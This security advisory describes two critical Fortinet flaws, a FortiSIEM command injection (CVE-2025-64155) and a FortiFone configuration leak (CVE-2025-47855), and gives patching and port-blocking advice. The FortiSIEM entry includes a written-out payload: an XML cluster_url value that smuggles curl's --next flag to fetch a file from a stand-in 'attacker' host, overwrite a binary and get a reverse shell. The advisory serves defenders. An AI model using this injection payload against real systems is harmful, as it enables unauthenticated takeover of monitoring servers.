Advisory

Fortinet patches critical remote code execution and data leak flaws

Take action: Make sure your FortiSIEM and FortiFone devices or at least the critical ports are isolated from the internet and accessible from trusted networks only. Then plan an update ASAP. Since there's a PoC exploit for CVE-2025-64155, this just become urgent.


Learn More

Fortinet released patches for two critical security flaws in its FortiSIEM and FortiFone products that allow attackers unauthenticated access to the system. 

Vulnerabilities summary:

  • CVE-2025-64155 (CVSS score 9.4) - An OS command injection flaw in FortiSIEM that allows unauthenticated remote code execution via port 7900. This service processes custom API messages without authentication, mapping commands to handlers via integers in phMonitorProcess::initEventHandler. The flaw targets handleStorageRequest with “elastic” storage type. User-controlled XML tags like cluster_name and cluster_url feed into /opt/phoenix/phscripts/bin/elastic_test_url.sh. The script’s curl invocation via execve allows argument injection. By leveraging curl’s obscure –next flag, attackers chain requests: <cluster_url>http://attacker:9200 –next -o /opt/phoenix/bin/phLicenseTool http://attacker:9200</cluster_url>. This overwrites phLicenseTool executed every few seconds as a reverse shell, yielding admin access. This issue only affects Super and Worker nodes, not Collector nodes.
  • CVE-2025-47855 (CVSS score 9.3) - An information exposure flaw in FortiFone that allows unauthenticated attackers to download device configurations. Attackers can send a web request to the web admin to download the device configuration file that often contains sensitive data:
    • Device configuration files
    • Local system settings
    • Network credentials or parameters

Fortinet advises users to update their software right away. If you cannot update FortiSIEM immediately, you should block access to port 7900.

Horizon3.ai released a proof-of-concept exploit on GitHub for CVE-2025-64155

Fortinet patches critical remote code execution and data leak flaws